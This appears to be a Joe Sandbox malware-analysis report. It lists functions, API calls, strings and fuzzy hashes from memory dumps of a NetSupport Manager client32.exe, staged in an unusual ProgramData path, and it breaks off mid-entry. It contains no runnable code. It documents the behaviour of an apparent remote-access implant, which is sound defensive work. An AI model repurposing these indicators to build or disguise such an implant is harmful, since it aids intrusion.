Opcode Fuzzy Hash: 8f1e1271e4c92c9c1a3a940e13d6e68fb89fa67028e9693a208c4530507fd11a
Instruction Fuzzy Hash: 317130B9E053557FEB10DB61DC89FEEFBA4AB44318F104194ED196A280EB706A40CF91

Function 11003760 Relevance: 40.7, APIs: 27, Instructions: 240COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000004), ref: 110037BF
InflateRect.USER32(?,000000FF,000000FF), ref: 110037DA
GetSysColor.USER32(00000010), ref: 110037ED
GetSysColor.USER32(00000010), ref: 11003804
GetSysColor.USER32(00000014), ref: 1100381B
GetSysColor.USER32(00000014), ref: 11003832
GetSysColor.USER32(00000014), ref: 11003855
GetSysColor.USER32(00000014), ref: 1100386C
GetSysColor.USER32(00000010), ref: 11003883
GetSysColor.USER32(00000010), ref: 1100389A
GetSysColor.USER32(00000004), ref: 110038B1
SetBkColor.GDI32(00000000,00000000), ref: 110038B8
InflateRect.USER32(?,000000FE,000000FD), ref: 110038C6
GetSysColor.USER32(00000010), ref: 110038E2
CreatePen.GDI32(?,00000001,00000000), ref: 110038EB
SelectObject.GDI32(00000000,00000000), ref: 110038F9
MoveToEx.GDI32(00000000,?,?,00000000), ref: 11003912
LineTo.GDI32(00000000,?,?), ref: 11003926
SelectObject.GDI32(00000000,?), ref: 11003934
DeleteObject.GDI32(?), ref: 1100393E
GetSysColor.USER32(00000014), ref: 1100394C
CreatePen.GDI32(?,00000001,00000000), ref: 11003955
SelectObject.GDI32(00000000,00000000), ref: 11003962
MoveToEx.GDI32(00000000,?,?,00000000), ref: 1100397E
LineTo.GDI32(00000000,?,?), ref: 11003995
SelectObject.GDI32(00000000,?), ref: 110039A3
DeleteObject.GDI32(00000000), ref: 110039AA

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Color$Object$Select$CreateDeleteInflateLineMoveRect
String ID:
API String ID: 1903512896-0
Opcode ID: f54cc67ce8688082e8d9bd7ceb245565d37858412d515c724044303615fa1441
Instruction ID: 5d0285bcf9a9339dda167f9027b4ec7cc5a21a28eaa690855b6058ef89d625f1
Opcode Fuzzy Hash: f54cc67ce8688082e8d9bd7ceb245565d37858412d515c724044303615fa1441
Instruction Fuzzy Hash: D08151B5900209AFDB10DFA4CC85FBFF7B9EB88305F104A18F611E7285D670A945CBA1

Function 110B7260 Relevance: 40.5, APIs: 13, Strings: 10, Instructions: 266librarycomloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Kernel32.dll,2F623E72), ref: 110B728D
GetProcAddress.KERNEL32(00000000,SetThreadExecutionState), ref: 110B72DA
SetLastError.KERNEL32(00000078), ref: 110B72F5
SystemParametersInfoA.USER32(00000010,00000000,?,00000000), ref: 110B730C
SystemParametersInfoA.USER32(00000011,00000000,00000000,00000000), ref: 110B7318
OleInitialize.OLE32(00000000), ref: 110B7354
LoadAcceleratorsA.USER32(00000000,00003330), ref: 110B741C
UpdateWindow.USER32(?), ref: 110B7486
OleUninitialize.OLE32 ref: 110B7507
GetProcAddress.KERNEL32(?,SetThreadExecutionState), ref: 110B751B
SetLastError.KERNEL32(00000078), ref: 110B7533
SystemParametersInfoA.USER32(00000011,00000001,00000000,00000000), ref: 110B7544
FreeLibrary.KERNEL32(?,?), ref: 110B7572

Part of subcall function 110B0B60: GetWindowPlacement.USER32(?,0000002C,75A77AA0), ref: 110B0B9F

Strings

1601, xrefs: 110B735B, 110B737A, 110B7392, 110B73B1, 110B74D1, 110B74F0
..\CTL32\NSMCobrowse.cpp, xrefs: 110B73FF
NSMCobrowse, xrefs: 110B731A
m_hWnd, xrefs: 110B7475
e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110B7470
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3, xrefs: 110B7397, 110B73B6, 110B74F5
Kernel32.dll, xrefs: 110B7288
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1, xrefs: 110B7360, 110B737F, 110B74D6
FALSE, xrefs: 110B7404
SetThreadExecutionState, xrefs: 110B72D1, 110B7515

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InfoParametersSystem$AddressErrorLastLibraryLoadProcWindow$AcceleratorsFreeInitializePlacementUninitializeUpdate
String ID: ..\CTL32\NSMCobrowse.cpp$1601$FALSE$Kernel32.dll$NSMCobrowse$SetThreadExecutionState$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
API String ID: 3244972839-2715558161
Opcode ID: f1869e9ace16bcabbdf441272b9f7ccf41929b43d66111c24cabc24926d86a2b
Instruction ID: f8ce5fb705e420c25b78c7aa5baaf6ec852ae9732c421639fd8232ddcd28cd9c
Opcode Fuzzy Hash: f1869e9ace16bcabbdf441272b9f7ccf41929b43d66111c24cabc24926d86a2b
Instruction Fuzzy Hash: 8C91A0B9E00659AFDB01DFA5CCC0AAEFBF4BF08308F54492DE515A7281DB306941CBA5

Function 6CC62CE0 Relevance: 38.6, APIs: 11, Strings: 11, Instructions: 58libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6CC62A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 6CC62ACB
Part of subcall function 6CC62A90: _strrchr.LIBCMT ref: 6CC62ADA
Part of subcall function 6CC62A90: _strrchr.LIBCMT ref: 6CC62AEA
Part of subcall function 6CC62A90: wsprintfA.USER32 ref: 6CC62B05

GetModuleHandleA.KERNEL32(NSMTRACE,6CC62AB1), ref: 6CC62CFA
GetProcAddress.KERNEL32(00000000,NSMTraceLoad), ref: 6CC62D15
GetProcAddress.KERNEL32(00000000,NSMTraceUnload), ref: 6CC62D22
GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigItem), ref: 6CC62D2F
GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigInt), ref: 6CC62D3C
GetProcAddress.KERNEL32(00000000,vRealNSMTrace), ref: 6CC62D49
GetProcAddress.KERNEL32(00000000,NSMTraceClose), ref: 6CC62D56
GetProcAddress.KERNEL32(00000000,NSMTraceReadConfigItemFromFile), ref: 6CC62D63
GetProcAddress.KERNEL32(00000000,NSMTraceExclusive), ref: 6CC62D70
GetProcAddress.KERNEL32(00000000,NSMTraceUnexclusive), ref: 6CC62D7D
GetProcAddress.KERNEL32(00000000,NSMTraceSetModuleName), ref: 6CC62D8A

Strings

NSMTraceLoad, xrefs: 6CC62D0F
NSMTraceExclusive, xrefs: 6CC62D65
NSMTRACE, xrefs: 6CC62CF5
NSMTraceReadConfigItemFromFile, xrefs: 6CC62D58
vRealNSMTrace, xrefs: 6CC62D3E
NSMTraceUnexclusive, xrefs: 6CC62D72
NSMTraceUnload, xrefs: 6CC62D17
NSMTraceSetModuleName, xrefs: 6CC62D7F
NSMTraceGetConfigInt, xrefs: 6CC62D31
NSMTraceClose, xrefs: 6CC62D4B
NSMTraceGetConfigItem, xrefs: 6CC62D24

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: AddressProc$Module_strrchr$FileHandleNamewsprintf
String ID: NSMTRACE$NSMTraceClose$NSMTraceExclusive$NSMTraceGetConfigInt$NSMTraceGetConfigItem$NSMTraceLoad$NSMTraceReadConfigItemFromFile$NSMTraceSetModuleName$NSMTraceUnexclusive$NSMTraceUnload$vRealNSMTrace
API String ID: 3896832720-3703587661
Opcode ID: d2fed89f1d4c804a9e1c161c1cdfe6071f061223cd29aab8d9ee31b3a42334a0
Instruction ID: 0cccf73f50945de58e7f9d6dc0b34e3487f946e5afda3d716d747cb3a336802a
Opcode Fuzzy Hash: d2fed89f1d4c804a9e1c161c1cdfe6071f061223cd29aab8d9ee31b3a42334a0
Instruction Fuzzy Hash: 85019E71E5266576DA10ABBAAC4CE8E6EB8FBE7711701491AF400D3610FAB49481CFD1

Function 110B1070 Relevance: 37.0, APIs: 11, Strings: 10, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11134770: _memset.LIBCMT ref: 111347B5
Part of subcall function 11134770: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 111347CE
Part of subcall function 11134770: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111347F5
Part of subcall function 11134770: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11134807
Part of subcall function 11134770: FreeLibrary.KERNEL32(00000000), ref: 1113481F
Part of subcall function 11134770: GetSystemDefaultLangID.KERNEL32 ref: 1113482A

LoadMenuA.USER32(00000000,000032E2), ref: 110B11C0
CreateWindowExA.USER32(00000000,NSMCobrMain,?,04CF0000,80000000,80000000,00000190,000001F4,00000000,00000000,?,00000000), ref: 110B11F5
SetWindowPlacement.USER32(?,0000002C,00000000,?,?,00000000), ref: 110B1299
GetMenu.USER32(?), ref: 110B12E3
DeleteMenu.USER32(00000000,00000004,00000400,?,?,00000000), ref: 110B12ED
GetWindowPlacement.USER32(?,0000002C,?,?,00000000), ref: 110B132E
GetMenu.USER32(?), ref: 110B1380
GetMenuItemCount.USER32(00000000), ref: 110B138A
DeleteMenu.USER32(00000000,-00000001,?,?,00000000), ref: 110B1393

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

UpdateWindow.USER32(?), ref: 110B13D5
BringWindowToTop.USER32(?), ref: 110B13DF

Strings

NSMCobrMain, xrefs: 110B11EF
..\CTL32\NSMCobrowse.cpp, xrefs: 110B1207
about:blank, xrefs: 110B1191
m_hWnd, xrefs: 110B120C, 110B1281, 110B12D2, 110B1316, 110B136F, 110B13C4
e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110B127C, 110B12CD, 110B1311, 110B136A, 110B13BF
e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 110B10FC, 110B1176
*WindowPos, xrefs: 110B1251
*StartPage, xrefs: 110B1133
IsA(), xrefs: 110B1101, 110B117B
,, xrefs: 110B1300

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$Window$DeleteLibraryLoadPlacement$AddressBringCountCreateDefaultErrorExitFreeItemLangLastMessageProcProcessSystemUpdateVersion_memsetwsprintf
String ID: *StartPage$*WindowPos$,$..\CTL32\NSMCobrowse.cpp$IsA()$NSMCobrMain$about:blank$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
API String ID: 2603857032-544735205
Opcode ID: 6ce295a978d4c0f578fdcd161a0048bff9384069b6bc0b2638a1909efe396e8a
Instruction ID: 0b238a22b308422866b6e53ee66487a0a9e71651472ee473fa52922344df5796
Opcode Fuzzy Hash: 6ce295a978d4c0f578fdcd161a0048bff9384069b6bc0b2638a1909efe396e8a
Instruction Fuzzy Hash: D791B078B00706AFD721DF61DC80FDAF3B5AF48708F008998E6569B685EB70B944CB95

Function 1104D640 Relevance: 35.4, APIs: 11, Strings: 9, Instructions: 447windowtimeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 1104D6D7
_malloc.LIBCMT ref: 1104D960

Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616

_memmove.LIBCMT ref: 1104D983
SendMessageTimeoutA.USER32(?,0000004A,00010486,?,00000002,00002710,00000000), ref: 1104D9EA
_free.LIBCMT ref: 1104D6F5

Part of subcall function 11151665: HeapFree.KERNEL32(00000000,00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115167B
Part of subcall function 11151665: GetLastError.KERNEL32(00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115168D

Part of subcall function 11037950: GetDateFormatA.KERNEL32(00000400,00000002,00000000,00000000,?,00000020,2F623E72,?,?,00000000,?,00000000,1116DED1,000000FF,?,1104DB2D), ref: 1103798F
Part of subcall function 11037950: GetTimeFormatA.KERNEL32(00000400,00000002,00000000,00000000,?,00000010,?,1104DB2D,?,?,000003EF,00000000), ref: 110379A4

_malloc.LIBCMT ref: 1104D716
_memmove.LIBCMT ref: 1104D726
GetTickCount.KERNEL32 ref: 1104D72E
IsWindow.USER32(?), ref: 1104D81E
_free.LIBCMT ref: 1104D9F1
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,000003EF,00000000,?,?,?,?,?,?), ref: 1104DB3F

Part of subcall function 110C5870: _free.LIBCMT ref: 110C589D

Strings

DisableMessage, xrefs: 1104D693
Send Message to StudentUI, xrefs: 1104D99C
Client, xrefs: 1104D698
pcicl32.dll, xrefs: 1104DB88
e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 1104D769
toastMessage.png, xrefs: 1104DC4B
Result of SendMessage %d, xrefs: 1104D9FD
IsA(), xrefs: 1104D76E
toastImageAndText.png, xrefs: 1104DC09

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free$CountFormatHeapTick_malloc_memmove$AllocateDateErrorFileFreeLastMessageModuleNameSendTimeTimeoutWindow
String ID: Client$DisableMessage$IsA()$Result of SendMessage %d$Send Message to StudentUI$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$pcicl32.dll$toastImageAndText.png$toastMessage.png
API String ID: 1763481038-1556842855
Opcode ID: 89253b66ee6cf2e231672e7c449c4be8a72049b9246303b6491cd8272ac9154d
Instruction ID: dd68662fa2b7b78e02f42c071c2c91de2c128a2af9df8d519f107d9f1f1afb16
Opcode Fuzzy Hash: 89253b66ee6cf2e231672e7c449c4be8a72049b9246303b6491cd8272ac9154d
Instruction Fuzzy Hash: 48029D74E0521A9FDB15DB64CDD8FDEB7B4AF58308F1081E8D80A97281EB70AA44CF61

Function 11029730 Relevance: 33.5, APIs: 4, Strings: 15, Instructions: 291timeCOMMON

Download Yara Rule

APIs

Part of subcall function 110E2140: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,00000000,00000001,00000000,?,1102EA96,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110E215C

Part of subcall function 110C4D10: _malloc.LIBCMT ref: 110C4D2A

Part of subcall function 110E1DB0: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110E1DFB

wsprintfA.USER32 ref: 11029ABD

Part of subcall function 110E2510: RegQueryInfoKeyA.ADVAPI32(0002001F,?,?,0002001F,?,?,0002001F,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,11029895), ref: 110E2546

FileTimeToSystemTime.KERNEL32(0002001F,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 110298CA
wsprintfA.USER32 ref: 1102990E
wsprintfA.USER32 ref: 11029975

Part of subcall function 110E2B90: wsprintfA.USER32 ref: 110E2BF4
Part of subcall function 110E2B90: _malloc.LIBCMT ref: 110E2C73

Strings

Error. Can't open %s, xrefs: 11029B40
accel=%d, wdm=%d, key=%s, mix=%s, dev=%s, xrefs: 1102999B
set %s=15, e=%d, xrefs: 11029A06
e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 11029B1C, 11029B30
Warning. DSReg e=%d, e2=%d, xrefs: 11029A5E
Software\NSL\Saved\DS, xrefs: 110299CE, 11029A2B
Acceleration, xrefs: 1102992A, 110299D3, 110299EE, 11029A01, 11029A30
%s\%s, xrefs: 1102996F, 11029AB7
WDM, xrefs: 11029947
%02d/%02d/%02d %02d:%02d:%02d.%03d, xrefs: 11029908
Accel=restored, xrefs: 11029A4D
DirectSound, xrefs: 110297FB
DirectSound\Device Presence, xrefs: 11029854
DirectSound\Mixer Defaults, xrefs: 11029827, 11029963
IsA(), xrefs: 11029B21, 11029B35

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$Time_malloc$EnumFileInfoOpenQuerySystem
String ID: %02d/%02d/%02d %02d:%02d:%02d.%03d$%s\%s$Accel=restored$Acceleration$DirectSound$DirectSound\Device Presence$DirectSound\Mixer Defaults$Error. Can't open %s$IsA()$Software\NSL\Saved\DS$WDM$Warning. DSReg e=%d, e2=%d$accel=%d, wdm=%d, key=%s, mix=%s, dev=%s$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$set %s=15, e=%d
API String ID: 2153351953-2541246523
Opcode ID: ea49658e0559d7249552271ef26cbc16e8dfc3201216cf4df3aa1f849712d45b
Instruction ID: 211f1d13b54fd8d85df03bceff53a25590f38c713c6c8c7458dc0526dc1957da
Opcode Fuzzy Hash: ea49658e0559d7249552271ef26cbc16e8dfc3201216cf4df3aa1f849712d45b
Instruction Fuzzy Hash: 5CB16F75D0162AAFDB21EB51CD88FEEB778AF44748F4041D9E909A2181EB706F84CF61

Function 11133230 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 281COMMONLIBRARYCODE

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 11133298
RaiseException.KERNEL32(80000003,00000000,00000000,00000000), ref: 111332E5

Strings

%d., xrefs: 111333B4
Support\, xrefs: 1113342A
C:\ProgramData\MScreenConnect\client32.exe, xrefs: 11133343, 11133351, 11133376
_%04d_%02d_%02d_%02d%02d%02d.dmp, xrefs: 111333E5

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountExceptionRaiseTick
String ID: %d.$C:\ProgramData\MScreenConnect\client32.exe$Support\$_%04d_%02d_%02d_%02d%02d%02d.dmp
API String ID: 473833368-1805726587
Opcode ID: eb20b46de86263ce3c0fc2cb08518a1f7edc3ee7639162ab589458b7dc855a32
Instruction ID: b1318081cbd1093ae19426a44e825ea54fb6d23b40abf42cfb15725aaffc0af2
Opcode Fuzzy Hash: eb20b46de86263ce3c0fc2cb08518a1f7edc3ee7639162ab589458b7dc855a32
Instruction Fuzzy Hash: 1EA11871918659AFDB22CF24CC44BDAF7F4BB88715F108298E959A73C4EB309A44CB94

Function 111357E0 Relevance: 31.7, APIs: 8, Strings: 10, Instructions: 220libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(netapi32.dll,?,?), ref: 11135815
GetProcAddress.KERNEL32(00000000,NetWkstaUserGetInfo), ref: 11135846
GetProcAddress.KERNEL32(00000000,NetUserGetInfo), ref: 11135854
GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 11135862
GetUserNameW.ADVAPI32(?,?), ref: 111358B3
GetTickCount.KERNEL32 ref: 11135920
GetTickCount.KERNEL32 ref: 11135943

Strings

NetUserGetInfo(%ls\%ls) took %d ms and ret x%x, xrefs: 11135961
AccessDenied, xrefs: 1113598D
NetUserGetInfo, xrefs: 11135848
d, xrefs: 111358A9
UserNotFound, xrefs: 11135A4E
NetWkstaUserGetInfo, xrefs: 11135840
InvalidComputer, xrefs: 11135A94
<not Available>, xrefs: 11135AD2
NetApiBufferFree, xrefs: 11135856
netapi32.dll, xrefs: 111357FE

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$CountTick$LibraryLoadNameUser
String ID: <not Available>$AccessDenied$InvalidComputer$NetApiBufferFree$NetUserGetInfo$NetUserGetInfo(%ls\%ls) took %d ms and ret x%x$NetWkstaUserGetInfo$UserNotFound$d$netapi32.dll
API String ID: 132346978-2450594007
Opcode ID: 8028d4dc932e1339b2f89bcb4110677fa4ed6e49f558c24d2048efc34b971f3a
